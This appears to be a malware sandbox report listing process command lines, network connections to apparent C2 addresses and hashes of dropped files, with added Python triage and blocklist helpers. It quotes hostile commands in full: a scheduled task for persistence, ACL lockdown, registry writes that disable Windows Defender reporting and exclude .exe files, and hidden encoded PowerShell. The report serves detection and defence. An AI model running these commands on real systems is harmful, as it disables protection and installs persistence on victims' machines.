schtasks /CREATE /TN "gegBeNqYW" /SC once /ST 01:05:08 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gegBeNqYW"

C:\Users\Admin\AppData\Local\Temp\33C.exe

C:\Users\Admin\AppData\Local\Temp\33C.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
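Read together, the command lines above are the sample's persistence and defence-evasion chain: the explothe.exe copy of 34AC.exe (same hashes in the Files section) registered as a scheduled task that fires every minute, CACLS used to deny the Admin account access to the dropped file and its folder, REG ADD launched through forfiles.exe to write Windows Defender policy values (an "exe" entry under Exclusions\Extensions, SpyNetReporting set to 0), and a one-shot task whose action is PowerShell with a base64/UTF-16LE -EncodedCommand. The Python below is an added triage helper, not part of the sandbox output; it runs a handful of regex checks over those command lines (copied from this report) and decodes the encoded payload. The rule names are this example's own, not sandbox signature names.

```python
"""Triage checks over the command lines recorded in the process list above."""
import base64
import re

# Command lines copied verbatim from the process list in this report.
OBSERVED = [
    r'"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F',
    r'"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit',
    r'"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"',
    r'REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32',
    r'schtasks /CREATE /TN "gegBeNqYW" /SC once /ST 01:05:08 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="',
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==',
    r'"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main',
    r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/',
]

# powershell.exe accepts -EncodedCommand and its unambiguous prefixes (-e, -ec, -enc, ...).
ENC_RE = re.compile(r'-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})', re.I)

# (tag, pattern) pairs. Tag names are this example's own, not sandbox signature names.
RULES = [
    ("defender_policy_tamper",
     re.compile(r'reg\s+add\s+\\?"?hklm\\software\\policies\\microsoft\\windows defender', re.I)),
    ("forfiles_proxy_exec", re.compile(r'forfiles(?:\.exe)?"?\s.*\s/c\s', re.I)),
    ("schtask_created", re.compile(r'schtasks(?:\.exe)?"?\s.*/create\b', re.I)),
    ("schtask_every_minute",
     re.compile(r'schtasks(?:\.exe)?"?\s.*/create\s.*/sc\s+minute\s+/mo\s+1\b', re.I)),
    ("acl_deny_self", re.compile(r'i?cacls\s+"[^"]+"\s+/p\s+"[^"]+:n"', re.I)),
    ("rundll32_user_profile_dll", re.compile(r'rundll32(?:\.exe)?"?\s+\S*\\users\\[^,]+\.dll', re.I)),
    ("hidden_window", re.compile(r'-windowstyle\s+hidden', re.I)),
    ("encoded_powershell", ENC_RE),
]


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(cmdline):
    """Return the set of triage tags that fire on one command line."""
    tags = {tag for tag, rx in RULES if rx.search(cmdline)}
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        # The decoded payload is itself a command line: run the same rules over it.
        tags |= {tag for tag, rx in RULES if rx.search(decoded)}
        if re.search(r'gpupdate(?:\.exe)?\s+/force', decoded, re.I):
            tags.add("gpupdate_force")
    return tags


def triage(cmdlines):
    """Keep only the command lines that trip at least one rule."""
    findings = []
    for c in cmdlines:
        tags = classify(c)
        if tags:
            findings.append({"cmdline": c, "tags": sorted(tags),
                             "decoded": decode_encoded_command(c)})
    return findings


if __name__ == "__main__":
    for f in triage(OBSERVED):
        print(", ".join(f["tags"]))
        print("    " + f["cmdline"][:110])
        if f["decoded"]:
            print("    decoded: " + f["decoded"])
```

The decoded payload is start-process -WindowStyle Hidden gpupdate.exe /force, which is consistent with the one-shot task existing to push the freshly written Defender policy values into effect rather than waiting for the next policy refresh. Only the Edge launch comes back untagged. Regex over command lines is brittle by nature: a variant that splits the REG ADD across more cmd hops or uses a different -EncodedCommand abbreviation than the ones handled here would need the patterns widened, so treat these as a starting point for hunting rather than a finished rule set.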

Network

Country Destination Domain Proto
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.68.249:80 77.91.68.249 tcp
US 8.8.8.8:53 29.68.91.77.in-addr.arpa udp
US 8.8.8.8:53 249.68.91.77.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
RU 193.233.255.73:80 193.233.255.73 tcp
US 8.8.8.8:53 73.255.233.193.in-addr.arpa udp
TR 185.216.70.222:80 - tcp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
FI 77.91.124.86:19084 - tcp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 www.facebook.com udp
NL 142.250.179.141:443 accounts.google.com tcp
FI 77.91.124.1:80 77.91.124.1 tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 1.124.91.77.in-addr.arpa udp
US 8.8.8.8:53 35.247.240.157.in-addr.arpa udp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
FI 77.91.124.86:19084 - tcp
US 8.8.8.8:53 static.xx.fbcdn.net udp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 15.201.240.157.in-addr.arpa udp
US 8.8.8.8:53 196.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 facebook.com udp
NL 157.240.201.35:443 facebook.com tcp
US 8.8.8.8:53 fbcdn.net udp
NL 157.240.201.35:443 fbcdn.net tcp
US 8.8.8.8:53 fbsbx.com udp
US 8.8.8.8:53 35.201.240.157.in-addr.arpa udp
N/A 224.0.0.251:5353 - udp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
NL 142.251.36.14:443 play.google.com udp
FI 77.91.68.29:80 77.91.68.29 tcp
RU 5.42.65.80:80 5.42.65.80 tcp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
FI 77.91.124.86:19084 - tcp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.124.86:19084 - tcp
NL 81.161.229.93:80 81.161.229.93 tcp
US 8.8.8.8:53 93.229.161.81.in-addr.arpa udp
FI 77.91.124.71:4341 - tcp
BG 171.22.28.213:80 171.22.28.213 tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 71.124.91.77.in-addr.arpa udp
US 8.8.8.8:53 213.28.22.171.in-addr.arpa udp
US 8.8.8.8:53 iplogger.com udp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 93.234.251.148.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.124.1:80 77.91.124.1 tcp
FI 77.91.124.86:19084 - tcp
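Most rows in this table are sandbox and browser noise: reverse-DNS lookups to 8.8.8.8, mDNS, and the Google, Facebook and Bing traffic that follows the Edge launches in the process list. The rows with an IP-literal Destination and no hostname (an empty Domain cell, or the IP repeated in the Domain column) are the ones worth carrying into a blocklist, and the two on ports 19084 and 4341 are the likeliest raw C2 channels. The Python below is an added helper, not part of the report; it parses rows in the table's own format (a subset copied from above is embedded), drops the noise, and counts the direct-to-IP endpoints. It treats an empty Domain cell and a "-" placeholder the same way.

```python
"""Separate the sandbox's network noise from the endpoints worth blocking."""
import ipaddress
from collections import Counter

# Rows copied from the Network table above (a representative subset). The Domain
# column is empty (or "-") when the sandbox could not tie the connection to a hostname.
ROWS = """\
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.68.249:80 77.91.68.249 tcp
RU 193.233.255.73:80 193.233.255.73 tcp
TR 185.216.70.222:80 tcp
FI 77.91.124.86:19084 tcp
NL 142.250.179.141:443 accounts.google.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
FI 77.91.124.1:80 77.91.124.1 tcp
FI 77.91.124.86:19084 - tcp
N/A 224.0.0.251:5353 udp
RU 5.42.65.80:80 5.42.65.80 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
NL 81.161.229.93:80 81.161.229.93 tcp
FI 77.91.124.71:4341 tcp
BG 171.22.28.213:80 171.22.28.213 tcp
DE 148.251.234.93:443 iplogger.com tcp
FI 77.91.124.86:19084 tcp
"""


def parse_row(line):
    """Split one 'Country Destination [Domain] Proto' row into a dict."""
    parts = line.split()
    if len(parts) == 4:
        country, dest, domain, proto = parts
    elif len(parts) == 3:
        country, dest, proto = parts
        domain = None
    else:
        raise ValueError(f"unexpected row: {line!r}")
    if domain == "-":
        domain = None
    ip, _, port = dest.rpartition(":")
    return {"country": country, "ip": ip, "port": int(port),
            "domain": domain, "proto": proto.lower()}


def classify_row(row):
    """Tag a parsed row as dns, mdns, named_host or direct_to_ip."""
    if row["proto"] == "udp" and row["port"] == 53:
        return "dns"
    if ipaddress.ip_address(row["ip"]).is_multicast:
        return "mdns"
    if row["domain"] is None or row["domain"] == row["ip"]:
        return "direct_to_ip"
    return "named_host"


def direct_to_ip_endpoints(text):
    """Count connections to IP-literal endpoints (no hostname involved)."""
    hits = Counter()
    for line in text.splitlines():
        row = parse_row(line)
        if classify_row(row) == "direct_to_ip":
            hits[f'{row["ip"]}:{row["port"]}'] += 1
    return dict(hits)


def nonstandard_ports(text):
    """Direct-to-IP endpoints on ports other than 80/443."""
    return sorted(ep for ep in direct_to_ip_endpoints(text)
                  if int(ep.rsplit(":", 1)[1]) not in (80, 443))


if __name__ == "__main__":
    for ep, n in sorted(direct_to_ip_endpoints(ROWS).items(), key=lambda kv: -kv[1]):
        print(f"{ep:<24} {n} connection(s)")
    print("non-standard ports:", ", ".join(nonstandard_ports(ROWS)))
```

The hostname rows still need a separate look: iplogger.com over 443 is a named host, so it is not in the direct-to-IP set even though it has no business in this process tree, and the sandbox's own country tags (FI, RU, TR, BG) are a hint about hosting, not an indicator on their own.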

Files

memory/1284-0-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1284-1-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3340-2-0x0000000002A10000-0x0000000002A26000-memory.dmp

memory/1284-3-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2EEB.exe

MD5 a602fb933a815818e7daf5c88bb73deb
SHA1 1f7c3c767ad641ee2cc33ce57db7edb4db60c4fb
SHA256 fc55215044da76fe9094b8937599ef7af22a0d235afa260584bb1f24194f9f3f
SHA512 06143730a107f3e4caca39b41b4020f686e86552e1faa53d722dbe4881111de23759574392f43ad2b53ef4d5f3905726e523f49174a9d02846df625f1afa5cfd

C:\Users\Admin\AppData\Local\Temp\2EEB.exe

MD5 a602fb933a815818e7daf5c88bb73deb
SHA1 1f7c3c767ad641ee2cc33ce57db7edb4db60c4fb
SHA256 fc55215044da76fe9094b8937599ef7af22a0d235afa260584bb1f24194f9f3f
SHA512 06143730a107f3e4caca39b41b4020f686e86552e1faa53d722dbe4881111de23759574392f43ad2b53ef4d5f3905726e523f49174a9d02846df625f1afa5cfd

C:\Users\Admin\AppData\Local\Temp\3034.exe

MD5 e561df80d8920ae9b152ddddefd13c7c
SHA1 0d020453f62d2188f7a0e55442af5d75e16e7caf
SHA256 5484ca53027230772ae149e3d7684b7e322432ceb013b6bc2440bd3c269192ea
SHA512 a7afed5a6434f296f0e0186de8ce87245bbd0f264498e327188a93551dd45e0e67409e62f3477b526ab5b0927e4349ad66107cbea7f7554b4be53c18227741a5

C:\Users\Admin\AppData\Local\Temp\3034.exe

MD5 e561df80d8920ae9b152ddddefd13c7c
SHA1 0d020453f62d2188f7a0e55442af5d75e16e7caf
SHA256 5484ca53027230772ae149e3d7684b7e322432ceb013b6bc2440bd3c269192ea
SHA512 a7afed5a6434f296f0e0186de8ce87245bbd0f264498e327188a93551dd45e0e67409e62f3477b526ab5b0927e4349ad66107cbea7f7554b4be53c18227741a5

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe

MD5 6b94af2713b9acf6f65cc6b9e08010ed
SHA1 278404e8fae40569fca7feeda0902bdfa999c804
SHA256 68cb5d45c7f8c3935fd665c5789c55dc095f310480f077240b46e6c878107ab9
SHA512 2f68ac396fe33ad41f4fbed9fdc2826d199fa59cb736ef055fdf3833c80c02e1e9f7e8f5f21ac9660e29b8dd28a6714acc10c9354baac31a4fc4f51f6bb2cfaf

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe

MD5 6b94af2713b9acf6f65cc6b9e08010ed
SHA1 278404e8fae40569fca7feeda0902bdfa999c804
SHA256 68cb5d45c7f8c3935fd665c5789c55dc095f310480f077240b46e6c878107ab9
SHA512 2f68ac396fe33ad41f4fbed9fdc2826d199fa59cb736ef055fdf3833c80c02e1e9f7e8f5f21ac9660e29b8dd28a6714acc10c9354baac31a4fc4f51f6bb2cfaf

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe

MD5 38e60fa53532e902f5182995962e1af7
SHA1 eaef3607804b8eed29f8c0c307656b101077a6b7
SHA256 6893c3c6fc131cfcb84f64b9b7965eae8a6f05f0cf02d16061dfca5aeceefeee
SHA512 c8d9d9bc2d34d73b2170e6c29814ac450f3a35b4fe101e6ea5eb915784d6da08ed6ecc912f8a8f08cc75bbded8b390b541566b28f734dd8139ed724a67805472

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe

MD5 38e60fa53532e902f5182995962e1af7
SHA1 eaef3607804b8eed29f8c0c307656b101077a6b7
SHA256 6893c3c6fc131cfcb84f64b9b7965eae8a6f05f0cf02d16061dfca5aeceefeee
SHA512 c8d9d9bc2d34d73b2170e6c29814ac450f3a35b4fe101e6ea5eb915784d6da08ed6ecc912f8a8f08cc75bbded8b390b541566b28f734dd8139ed724a67805472

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe

MD5 f61ae3abc8f1610999e26dc248c7bc37
SHA1 174ae868f65b67a567149612c41cbd05ed48307b
SHA256 32b7453d0765447d59fee8283a8e4d20fed54f5b0f4401e577da6521b90eb356
SHA512 71cab50f87128d737c34b9a7c0873f9aa883b707d80e16e8e7fc26e02f5190793b9dd48a57029f35d98a76336fc0e984358b7aae5448497e13eb62c94f2ff7cb

C:\Users\Admin\AppData\Local\Temp\3268.exe

MD5 73089952a99d24a37d9219c4e30decde
SHA1 8dfa37723afc72f1728ec83f676ffeac9102f8bd
SHA256 9aa54a5b73fe93d789ec1707ebd41ff824fcf6ba34b18d97ebc566cee8cbce60
SHA512 7088b995c0f6425ad4460b1f286d36e5b7ca3d79308febfac7f212e630b00569239e0b22455198739d20b1fbae1b70c24c22f41a34bab19a793aaa31164aa2d2

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe

MD5 f61ae3abc8f1610999e26dc248c7bc37
SHA1 174ae868f65b67a567149612c41cbd05ed48307b
SHA256 32b7453d0765447d59fee8283a8e4d20fed54f5b0f4401e577da6521b90eb356
SHA512 71cab50f87128d737c34b9a7c0873f9aa883b707d80e16e8e7fc26e02f5190793b9dd48a57029f35d98a76336fc0e984358b7aae5448497e13eb62c94f2ff7cb

C:\Users\Admin\AppData\Local\Temp\31AC.bat

MD5 403991c4d18ac84521ba17f264fa79f2
SHA1 850cc068de0963854b0fe8f485d951072474fd45
SHA256 ef6e942aefe925fefac19fa816986ea25de6935c4f377c717e29b94e65f9019f
SHA512 a20aaa77065d30195e5893f2ff989979383c8d7f82d9e528d4833b1c1236aef4f85284f5250d0f190a174790b650280ffe1fbff7e00c98024ccf5ca746e5b576

C:\Users\Admin\AppData\Local\Temp\3268.exe

MD5 73089952a99d24a37d9219c4e30decde
SHA1 8dfa37723afc72f1728ec83f676ffeac9102f8bd
SHA256 9aa54a5b73fe93d789ec1707ebd41ff824fcf6ba34b18d97ebc566cee8cbce60
SHA512 7088b995c0f6425ad4460b1f286d36e5b7ca3d79308febfac7f212e630b00569239e0b22455198739d20b1fbae1b70c24c22f41a34bab19a793aaa31164aa2d2

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe

MD5 903df47765bf667e558b3bf3dd61b5d6
SHA1 bcfb0cc665d93f98c3fc3e6225e1b4b813110b92
SHA256 3ceebf3a8bb014477fd423ed56b8674ab495b4ae4f37029fcde34ee240788bb5
SHA512 b2580c0a231ed5deb440ed2f15d84237dfd65403c037bb61c340d06b6b6809c01d9bf45a33d236e323adfb3e13d9de22a82ca1f459e82f1d8fdc1e2b2e98422b

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe

MD5 903df47765bf667e558b3bf3dd61b5d6
SHA1 bcfb0cc665d93f98c3fc3e6225e1b4b813110b92
SHA256 3ceebf3a8bb014477fd423ed56b8674ab495b4ae4f37029fcde34ee240788bb5
SHA512 b2580c0a231ed5deb440ed2f15d84237dfd65403c037bb61c340d06b6b6809c01d9bf45a33d236e323adfb3e13d9de22a82ca1f459e82f1d8fdc1e2b2e98422b

C:\Users\Admin\AppData\Local\Temp\3334.exe

MD5 d2ed05fd71460e6d4c505ce87495b859
SHA1 a970dfe775c4e3f157b5b2e26b1f77da7ae6d884
SHA256 3a119008fd025a394f6fb93a0c941e1dc0fa1f9c7606a674388f21d99dfe116f
SHA512 a15efc7c5ddd82ea612444b5df530d11da43bbaaf7f7ae4801c8063c8cffe4538cd47e27639e380b9d1c7e342575169e06af4b298a8faf635865dc4f9dc11b8e

C:\Users\Admin\AppData\Local\Temp\3334.exe

MD5 d2ed05fd71460e6d4c505ce87495b859
SHA1 a970dfe775c4e3f157b5b2e26b1f77da7ae6d884
SHA256 3a119008fd025a394f6fb93a0c941e1dc0fa1f9c7606a674388f21d99dfe116f
SHA512 a15efc7c5ddd82ea612444b5df530d11da43bbaaf7f7ae4801c8063c8cffe4538cd47e27639e380b9d1c7e342575169e06af4b298a8faf635865dc4f9dc11b8e

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iN14Uw1.exe

MD5 7ae896700c6a7c8ca974166315d197bb
SHA1 a6b6520d103807edaef30eea48503a21233f5bc8
SHA256 16d8fb105ca3765d9a91ce2f0aebd4a9d31ab90ab888f4f8e7e7090547cb34b8
SHA512 e933efde83e12c2854e1ea5a6337a5019f15a7196212c0c9015f91196d34e8e33ffada806dd873c4f79ee0e575bfcdeea483763d7844cc93b83bef0ec358b8d1

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iN14Uw1.exe

MD5 7ae896700c6a7c8ca974166315d197bb
SHA1 a6b6520d103807edaef30eea48503a21233f5bc8
SHA256 16d8fb105ca3765d9a91ce2f0aebd4a9d31ab90ab888f4f8e7e7090547cb34b8
SHA512 e933efde83e12c2854e1ea5a6337a5019f15a7196212c0c9015f91196d34e8e33ffada806dd873c4f79ee0e575bfcdeea483763d7844cc93b83bef0ec358b8d1

memory/3908-64-0x0000000000C30000-0x0000000000C6E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\34AC.exe

MD5 4bd59a6b3207f99fc3435baf3c22bc4e
SHA1 ae90587beed289f177f4143a8380ba27109d0a6f
SHA256 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236
SHA512 ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324

C:\Users\Admin\AppData\Local\Temp\34AC.exe

MD5 4bd59a6b3207f99fc3435baf3c22bc4e
SHA1 ae90587beed289f177f4143a8380ba27109d0a6f
SHA256 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236
SHA512 ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324

memory/2308-70-0x0000000073E80000-0x0000000074630000-memory.dmp

memory/3908-74-0x0000000008080000-0x0000000008624000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 4bd59a6b3207f99fc3435baf3c22bc4e
SHA1 ae90587beed289f177f4143a8380ba27109d0a6f
SHA256 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236
SHA512 ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324

memory/3908-75-0x0000000007B70000-0x0000000007C02000-memory.dmp

memory/3908-63-0x0000000073E80000-0x0000000074630000-memory.dmp

memory/2308-62-0x0000000000900000-0x000000000090A000-memory.dmp

memory/3908-76-0x0000000007B50000-0x0000000007B60000-memory.dmp

memory/3908-77-0x0000000007B00000-0x0000000007B0A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 4bd59a6b3207f99fc3435baf3c22bc4e
SHA1 ae90587beed289f177f4143a8380ba27109d0a6f
SHA256 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236
SHA512 ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 4bd59a6b3207f99fc3435baf3c22bc4e
SHA1 ae90587beed289f177f4143a8380ba27109d0a6f
SHA256 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236
SHA512 ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 777424efaa0b7dc4020fed63a05319cf
SHA1 f4ff37d51b7dd7a46606762c1531644b8fbc99c7
SHA256 30d13502553b37ca0221b08f834e49be44ba9b9c2bbb032dded6e3ab3f0480d5
SHA512 7e61eab7b512ac99d2c5a5c4140bf0e27e638eb02235cd32364f0d43ee0784e2d8ac212d06a082c1dce9f61c63b507cb8feb17efffbd1954b617208740f72ad9

memory/3908-87-0x0000000008C50000-0x0000000009268000-memory.dmp

memory/3908-89-0x0000000007E50000-0x0000000007F5A000-memory.dmp

memory/3908-90-0x0000000007D80000-0x0000000007D92000-memory.dmp

memory/3908-96-0x0000000007DE0000-0x0000000007E1C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 483924abaaa7ce1345acd8547cfe77f4
SHA1 4190d880b95d9506385087d6c2f5434f0e9f63e8
SHA256 9a111c2b76c1b5f6d4f702502b9ff4326b7b5682921c2760286dd073824cb684
SHA512 e4ac0a0d5f06e056901c68488e34358a32a5bc7aeffcd82af7eba6043d0fa35eaa67a67c3716dcb661aaca441677819bcba7d35bc4efc6103f3ce32f78e32310

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 483924abaaa7ce1345acd8547cfe77f4
SHA1 4190d880b95d9506385087d6c2f5434f0e9f63e8
SHA256 9a111c2b76c1b5f6d4f702502b9ff4326b7b5682921c2760286dd073824cb684
SHA512 e4ac0a0d5f06e056901c68488e34358a32a5bc7aeffcd82af7eba6043d0fa35eaa67a67c3716dcb661aaca441677819bcba7d35bc4efc6103f3ce32f78e32310

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 483924abaaa7ce1345acd8547cfe77f4
SHA1 4190d880b95d9506385087d6c2f5434f0e9f63e8
SHA256 9a111c2b76c1b5f6d4f702502b9ff4326b7b5682921c2760286dd073824cb684
SHA512 e4ac0a0d5f06e056901c68488e34358a32a5bc7aeffcd82af7eba6043d0fa35eaa67a67c3716dcb661aaca441677819bcba7d35bc4efc6103f3ce32f78e32310

memory/3908-102-0x0000000007F60000-0x0000000007FAC000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 483924abaaa7ce1345acd8547cfe77f4
SHA1 4190d880b95d9506385087d6c2f5434f0e9f63e8
SHA256 9a111c2b76c1b5f6d4f702502b9ff4326b7b5682921c2760286dd073824cb684
SHA512 e4ac0a0d5f06e056901c68488e34358a32a5bc7aeffcd82af7eba6043d0fa35eaa67a67c3716dcb661aaca441677819bcba7d35bc4efc6103f3ce32f78e32310

\??\pipe\LOCAL\crashpad_2364_UPQAUNWEKUIQRXJS

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

\??\pipe\LOCAL\crashpad_1396_KKGUBAOAVITBZQPM

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 b85b459ce4b6227d444c73eb54fcde76
SHA1 c0af3d42cd5c82a53b11e72d0b1199f44dc52b5b
SHA256 39063c71ee8ba3ed1bf46ad8ea157c906ca4832104b1d32418dade68574ea41a
SHA512 21900cffdba85a6eec6cf49b175d13d62ce7e2a9b8bee29b928745b26d420b7bc882809fda8e5736b76ee9dc04c94a7373bfb210060c1f288405d276669e8513

memory/3896-128-0x0000000000400000-0x0000000000434000-memory.dmp

memory/3896-129-0x0000000000400000-0x0000000000434000-memory.dmp

memory/3896-130-0x0000000000400000-0x0000000000434000-memory.dmp

memory/3896-132-0x0000000000400000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 d91806d9627cc9f3bd49bc4d1f95a29d
SHA1 939012e1eb9073d978b71bd8ff6b9bc7d163ef1d
SHA256 a5a93a6776b0e15958fb7b0e1af6f0d0d50dddf98b6f663f1d76660b00ee8186
SHA512 0957b711d6b79d45843b072f4653f6041550ccce4d89c85326db95d6e44c2888285e163533e8bc481f679f627f12b0d5b7b086b83c365e3ef66c0701b45b4a0b

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2ZG494bY.exe

